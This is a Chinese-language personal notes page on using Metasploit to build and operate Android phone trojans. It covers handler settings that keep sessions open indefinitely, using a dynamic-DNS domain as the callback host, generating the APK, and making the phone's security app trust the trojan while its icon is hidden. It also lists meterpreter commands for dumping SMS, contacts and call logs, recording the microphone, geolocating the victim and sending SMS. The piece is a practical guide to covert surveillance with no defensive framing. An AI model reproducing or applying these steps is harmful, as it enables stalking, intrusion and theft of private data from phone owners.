msf安卓手机木马实战要点整理

Msf手机木马高级选项设置说明

Androidwakelock  阻止手机休眠以便处理耗时操作

AutoUnhookProcess  ？

AutoVerifySession        自动验证删除无效会话

AutoVerifySessionTimeout 超时期间等待会话验证发生在几秒钟内

EnableStageEncoding         对第二级有效载荷进行编码

SessionRetryTotal               网络故障时尝试重新连接的秒数

SessionRetryWait         重新连接尝试之间等待的秒数

StagerRetryCount        如果第一次连接失败，stager应重试的次数

SessionCommunicationTimeou  应终止此会话之前没有活动的秒数         

SessionExpirationTimeout   应强制关闭此会话之前的秒数

 

 

设置自动执行脚本

set AutoRunScript "multi_console_command -r /root/meterpreter.rc"

注意，一定要set AutoRunScript以后再启动handler，否则不生效。

设置好后，当新的session接入后就会自动执行文件中的命令。

 

 

PayloadUUIDTracking

• PingbackRetries - pingback的次数
• PingbackSleep - pinigback的时间间隔

Pingback       https://xz.aliyun.com/t/6268

至于什么是pingback

AV对msf之前的常规reverse_shell会进行拦截，导致我们并不能很清楚的知道目标是否存在该漏洞，然后这个payload就完全不会产生交互式shell，而只是返回一个UUID，能让我们知道poc/exp是否执行成功，然后目标是否存在当前漏洞，而不必担心被中间人攻击或者被拦截

使用 Wireshark 也只能捕获到16byte的UUID值

最小化的攻击载荷了，而且特征也并不明显，只是一串随机的UUID值而已，感觉用来验证漏洞还是挺不错的

 

android/meterpreter_reverse_http

HttpServerName         处理程序将响应请求发送的服务器头

OverrideLHOST    当设置了OverrideRequestHost时，将此值用作辅助请求的主机名

OverrideRequestHost  强制指定主机和端口，而不是使用客户端请求的内容，默认为LHOST:LPORT

OverrideScheme   设置OverrideRequestHost时，将此值用作辅助请求（如http或https）的方案

 

 

exploit/multi/handler            监听模块选项设置

exploit -j -z可在后台持续监听,-j为后台任务，-z为持续监听，使用Jobs命令查看和管理后台任务。jobs -K可结束所有任务。

sessions -l -v 列出可用sessions 详细信息 
sessions -s script 在指定session 执行脚本 
sessions -K 结束session 
sessions -c cmd 执行指定命令 
sessions -u sessionID 升级shell防止假session

set ExitOnSession false //可以在接收到seesion后继续监听端口，保持侦听经常会遇到假session或者刚连接就断开的情况，这里补充一些监听参数，防止假死与假session

防止session意外退出

set SessionCommunicationTimeout 0 //默认情况下，如果一个会话将在5分钟（300秒）没有任何活动，那么它会被杀死,为防止此情况可将此项修改为0

set SessionExpirationTimeout 0 //默认情况下，一个星期（604800秒）后，会话将被强制关闭,修改为0可永久不会被关闭

 

session 千万不能退出

 

花生壳域名应该不变但是ip会变，生成木马设置lhost=域名

armitage生成手机木马时必须要选raw输出格式文件名需要带后缀apk

java格式不能用

 

设置手机里管家信任木马，开机启动项勾选木马，权限全部勾选

睡眠或者无操作时不允许请自动清除，隐藏图标，设置自动脚本收集信息

 

 

一 什么是wake_lock

wake_lock锁主要是相对系统的休眠而言的，意思就是我的程序给CPU加了这个锁那系统就不会休眠了，这样做的目的是为了全力配合我们程序的运行。有的情况如果不这么做就会出现一些问题，比如微信等及时通讯的心跳包会在熄屏不久后停止网络访问等问题。所以微信里面是有大量使用到了wake_lock锁。

wake_lock:两种锁，一种计数锁；非计数锁(锁了很多次，只需要release一次就可以解除了)

 

 

 

meterpreter手机木马功能选项说明

Core Commands        核心命令

 

resource              在当前会话运行脚本资源文件

secure                  新加密密钥

get_timeouts        获取当前会话超时值

       Session Expiry  : @ 2020-03-29 11:46:15   session退出时间

Comm Timeout    : 300 seconds                连接超时时间（不活跃后多长时间退出）

Retry Total Time: 3600 seconds                    重试连接的总时间

Retry Wait Time : 10 seconds                       重试连接等待的时间

set_timeouts         设置超时时间

       -x   -c   -t    -w  同上边对应

      

transport              ？？

channel               ？？

 

File system Commands     文件系统命令

 

cat  查看文件

download 下载文件

lls列出本地文件

search  搜索文件       search -f *.jpg

upload 上传文件

 

Networking Commands    网络命令

 

Portfwd  将本地端口转发到远程服务

Route     路由视图和修改路由表

 

System Commands           系统命令

 

Execute  执行一个命令      例如

execute -f cmd.exe -i -t

execute -f cmd.exe -i 交互式运行cmd 
execute -f cmd.exe -i -t 使用可用token 运行 
execute -f cmd.exe -i -H -t 同上，同时隐藏进程 

Pgrep     按名称筛选进程

Ps           列出进程

 

 

User interface Commands 用户界面命令

 

录屏功能失败，原因未知

 

 

Webcam Commands         网络摄像头命令

 

record_mic    录音

Audio Output Commands 音频输出命令

 

Play        播放声音

 

Android Commands          安卓命令

 

activity_start    打开一个网址

dump_calllog        下载电话记录

dump_contacts     下载联系人列表

dump_sms            下载短信

geolocate             失效，利用地理定位获取当前纬度

hide_app_icon      隐藏app图标

interval_collect     管理间隔收集功能      ？？

send_sms             发送短信

set_audio_mode   设置响铃模式

sqlite_query          从存储中查询SQLite数据库

wakelock              启用/禁用唤醒锁定

wlan_geolocate    使用WLAN信息获取当前纬度

 

Application Controller Commands 应用控制命令

 

app_install    安装软件

app_list      列出所有app

app_run      启动一个app  例如截屏

app_uninstall  卸载一个app